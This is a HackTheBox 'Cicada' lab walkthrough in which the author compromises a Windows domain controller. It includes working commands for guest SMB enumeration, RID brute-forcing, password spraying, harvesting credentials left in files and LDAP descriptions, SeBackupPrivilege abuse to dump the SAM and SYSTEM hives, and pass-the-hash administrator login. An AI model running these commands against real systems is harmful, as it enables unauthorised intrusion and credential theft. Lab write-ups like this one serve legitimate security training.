HackTheBox -Cicada
Cicada is a beginner-to-intermediate Windows machine that focuses on foundational Active Directory enumeration and exploitation techniques. Throughout the engagement, I enumerated the domain to identify user accounts, explored accessible network shares, uncovered plaintext credentials stored within files, performed a password spraying attack, and finally leveraged the SeBackupPrivilege to escalate privileges and fully compromise the system.
Port Scan
We start off with a nmap scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
nmap -sC -sV 10.129.66.140 -o nmap/nmapscan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-06 16:26:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Judging from the open ports we have a window Domain Controller and we can add the machine name cicada.htb to our /etc/hosts.
We have no web server thus we can start with smb
smb Enumeration
We try if we can null authentication using netexec
- NetExec (nxc) is a network service exploitation tool that helps automate assessing the security of networks.
1
2
3
4
5
nxc smb cicada.htb -u '.' -p ''
SMB 10.129.66.140 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.66.140 445 CICADA-DC [+] cicada.htb\.: (Guest)
We can authenticate as Guest without a password and lets list the shares.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
nxc smb cicada.htb -u '.' -p '' --shares
SMB 10.129.66.140 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.66.140 445 CICADA-DC [+] cicada.htb\.: (Guest)
SMB 10.129.66.140 445 CICADA-DC [*] Enumerated shares
SMB 10.129.66.140 445 CICADA-DC Share Permissions Remark
SMB 10.129.66.140 445 CICADA-DC ----- ----------- ------
SMB 10.129.66.140 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.66.140 445 CICADA-DC C$ Default share
SMB 10.129.66.140 445 CICADA-DC DEV
SMB 10.129.66.140 445 CICADA-DC HR READ
SMB 10.129.66.140 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.66.140 445 CICADA-DC NETLOGON Logon server share
SMB 10.129.66.140 445 CICADA-DC SYSVOL Logon server share
We have read access to HR We use smbclient to view the shares.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
smbclient //10.129.66.140/HR -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 15:29:09 2024
.. D 0 Thu Mar 14 15:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 20:31:48 2024
4168447 blocks of size 4096. 481853 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \> exit
We have a note from the HR we download it and read its contents.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, dont hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
The note advise the new hire to change their default password after login and also discloses the password.
- Default password :
Cicada$M6Corpb*@Lp#nZp!8
Now that we have a password we can do a password spray but we need a list os user names.
To get the the users in the machine we use --rid-brute flag on the netexec , this will enumerate users by bruteforcing RIDs.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# since the list is big we direct the out put to a file
nxc smb cicada.htb -u '.' -p '' --rid-brute > userslist.txt
# to filter the list we can use the awk command
awk -F : '{ print $2 }' userslist.txt | grep 'SidTypeUser' | awk -F '\' '{ print $2 }' | awk -F ' ' '{ print $1 }' > users.txt
# here is the users list but we can go further and delete the fist 3 since they are default
cat users.txt
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
Now with that we do the password spray.
1
2
3
4
5
6
7
8
9
10
11
nxc smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB 10.129.66.140 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.66.140 445 CICADA-DC [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.66.140 445 CICADA-DC [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.66.140 445 CICADA-DC [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.66.140 445 CICADA-DC [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.66.140 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.66.140 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.66.140 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
We get a success on michael.wrightson which means he didn’t change the password.
We list the shares now as michael .
1
2
3
4
5
6
7
8
9
10
11
12
13
14
nxc smb cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
SMB 10.129.66.140 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.66.140 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.66.140 445 CICADA-DC [*] Enumerated shares
SMB 10.129.66.140 445 CICADA-DC Share Permissions Remark
SMB 10.129.66.140 445 CICADA-DC ----- ----------- ------
SMB 10.129.66.140 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.66.140 445 CICADA-DC C$ Default share
SMB 10.129.66.140 445 CICADA-DC DEV
SMB 10.129.66.140 445 CICADA-DC HR READ
SMB 10.129.66.140 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.66.140 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.66.140 445 CICADA-DC SYSVOL READ Logon server share
When enumerating user description we get a user who left some sensitive information, this read guides on the enumeration process .
1
2
3
4
5
6
7
8
9
10
11
12
13
14
nxc ldap cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M user-desc
SMB 10.129.66.140 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.129.66.140 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
USER-DESC 10.129.66.140 389 CICADA-DC User: krbtgt - Description: Key Distribution Center Service Account
USER-DESC 10.129.66.140 389 CICADA-DC User: david.orelious - Description: Just in case I forget my password is aRt$Lp#7t*VQ!3
USER-DESC 10.129.66.140 389 CICADA-DC Saved 4 user descriptions to .../.nxc/logs/UserDesc-10.129.66.140-20250206_132327.log
cat /.nxc/logs/UserDesc-10.129.66.140-20250206_132327.log
User: Description:
Administrator Built-in account for administering the computer/domain
Guest Built-in account for guest access to the computer/domain
krbtgt Key Distribution Center Service Account
david.orelious Just in case I forget my password is aRt$Lp#7t*VQ!3
The user david.orelious exposes his password aRt$Lp#7t*VQ!3
We list the shares that the new user has access to :
1
2
3
4
5
6
7
8
9
10
11
12
13
nxc smb cicada.htb -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.129.66.140 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.66.140 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.66.140 445 CICADA-DC [*] Enumerated shares
SMB 10.129.66.140 445 CICADA-DC Share Permissions Remark
SMB 10.129.66.140 445 CICADA-DC ----- ----------- ------
SMB 10.129.66.140 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.66.140 445 CICADA-DC C$ Default share
SMB 10.129.66.140 445 CICADA-DC DEV READ
SMB 10.129.66.140 445 CICADA-DC HR READ
SMB 10.129.66.140 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.66.140 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.66.140 445 CICADA-DC SYSVOL READ Logon ser
The user has access to DEV
1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ smbclient //10.129.66.140/DEV -U 'david.orelious'
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 15:31:39 2024
.. D 0 Thu Mar 14 15:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 20:28:22 2024
4168447 blocks of size 4096. 478133 blocks available
smb: \> get "Backup_script.ps1"
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \>
We get a powershell script.
1
2
3
4
5
6
7
8
9
10
11
12
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
From the script we get a user who set some variables of which some expose the user’s creds.
- username :
emily.oscars - password :
Q!3@Lp#M6b*7t*Vt
Since we got the two non-default shares we can try winrm with the new user.
1
2
3
4
nxc winrm cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
WINRM 10.129.66.140 5985 CICADA-DC [*] Windows Server 2022
WINRM 10.129.66.140 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
We can get a shell using evil-winrm
1
2
3
4
5
6
7
8
9
10
11
12
13
evil-winrm -i cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami
cicada\emily.oscars
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
Privilege Escalation
Now with the shell we try enumerating the user privileges.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
The user SeBackupPrivilege privilege is enabled.
The SeBackupPrivilege is a Windows privilege that provides a user or process with the ability to read files and directories, regardless of the security settings on those objects. This privilege can be used by certain backup programs or processes that require the capability to back up or copy files that would not normally be accessible to the user.
However, if this privilege is not properly managed or if it is granted to unauthorized users or processes, it can lead to a privilege escalation vulnerability. The SeBackupPrivilege vulnerability can be exploited by malicious actors to gain unauthorized access to sensitive files and data on a system.
Our task is to exploit the vulnerability to gain unauthorized access to sensitive files and data on a system like the sam and system hive. 1) Create a temp directory:
1
mkdir C:\temp
2) Copy the sam and system hive of HKLM to C:\temp and then download them.
1
reg save hklm\sam C:\temp\sam.hive
and
1
reg save hklm\system C:\temp\system.hive
- Use impacket-secretsdump tool and obtain ntlm hashes:
1
2
3
4
5
6
7
8
9
10
11
12
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
Now can use evil-winrm to pass the hash and connect as Local Administrator:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
evil-winrm -i cicada.htb -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>
This post is licensed under CC BY 4.0 by the author.